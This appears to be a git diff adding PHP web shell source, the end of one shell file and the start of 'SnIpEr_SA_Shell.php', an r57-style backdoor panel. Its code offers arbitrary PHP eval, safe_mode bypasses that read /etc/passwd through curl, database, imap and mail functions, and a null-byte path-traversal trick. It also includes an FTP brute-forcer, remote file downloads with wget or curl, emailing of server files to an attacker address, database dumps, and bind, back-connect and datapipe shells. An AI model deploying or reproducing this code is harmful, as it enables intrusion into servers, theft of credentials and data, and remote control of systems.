+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell  | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | ÊÚÑíÈ æÊØæíÑ ]---o</b></font></div></td></tr></table>".$f;
+
+
+$u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+echo "<PRE>\n";
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+die("\nSnIpEr_SA");
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>
+<B>".htmlspecialchars($u1p)."</B> ÚİæÇ! Çáãáİ ÛíÑ ãæÌæÏ Çæ áíÓ áÏíß ÇáÕáÇÍíå ááÏÎæá.</CENTER></FONT>");
+}
+
+?>
\ No newline at end of file
diff --git a/php/SnIpEr_SA_Shell.php b/php/SnIpEr_SA_Shell.php
new file mode 100644
index 0000000..787edb8
--- /dev/null
+++ b/php/SnIpEr_SA_Shell.php
@@ -0,0 +1,1711 @@
+<?php
+/******************************************************************************************************/
+/*                                      #  ##        ##   #
+/*                                    # # ## ###   ##   ## #  #
+/*                                  # ###  ### # ###   ##  ### #
+/*                                #      ##  ######### ##   #
+/*                                          ##########
+/*                                  ###      #########      ###
+/*                                #    ##     #######     ##    #
+/*                                       ##    #####    ##
+/*                                         ##  ####  ##
+/*                                             ####   ##
+/*                                            ######
+/*                                           ## ## ##
+/*                                        @@    ##    @@
+/*                                    @ @@@    ####    @@@ @
+/*                                    @@@     ######    @@@
+/*
+/*
+/*
+/*
+/*
+/*  SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/
+/*  ??????:
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by SnIpEr_SA
+/*  MAIL http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ÇáÎíÇÑÇÊ | Options  ~~~ */
+
+// ÇááÛÉ | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - áÊİÚíá ÇáÏÎæá Èßáãå ÇáãÑæÑ  ( authentification = On  )
+// $auth = 0; - áÇíŞÇİ ÇáÏÎæá ÈßáãÉ ÇáãÑæÑ ( authentification = Off )
+$auth = 0;
+
+// áÏÎæá ÈßáãÉ ãÑæÑ æÇÓã ãÓÊÎÏã (Login & Password for access)
+// áÍãÇíÉ ÇáÓßÑÈÊ ãä ÏÎæá ÛíÑß ÛíÑ ÇáÊÇáí!!! (CHANGE THIS!!!)
+// åäÇ æÖÚß ßáãå ÇáãÑæÑ æåí ãÔİÑå ÈÕíÛå md5, æßáãÉÚ ÇáãÑæÑ åäÇ åí  'r57'
+// ÊÓÊÚØíÚ Çä ÊÔİÑ ßáãÉ ãÑæÑß æÇÓã ÇáãÓÊÎÏã ÈÕíÛÉ md5 ææÖÚåÇ İí ÇáÎÇäÇÊ ÇáÊÇáíå
+$name='ec371748dc2da624b35a4f8f685dd122'; // ÇÓã ÇáãÓÊÎÏã  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ßáãÉ ÇáãÑæÑ (user password)
+/******************************************************************************************************/
+if(empty($_POST['SnIpEr_SA'])){
+
+} else {
+$m=$_POST['SnIpEr_SA'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+
+}
+echo "".htmlspecialchars($m)."";
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- SnIpEr_SA -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>SnIpEr_SA shell</title>
+
+
+
+<STYLE>
+BODY {
+        SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010
+}
+
+tr {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #cccccc;
+}
+.table1 {
+BORDER: 1px;
+BACKGROUND-COLOR: #333333;
+color: #333333;
+}
+.td1 {
+BORDER: 1px;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1px;
+color: #2279D9;
+}
+table {
+BORDER:  #eeeeee 2px outset;
+BACKGROUND-COLOR: #272727;
+color: #2279D9;
+}
+input {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #800000;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #CCCCCC;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #2279D9;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #3D3D3D;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 2px;
+color: #2279D9;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
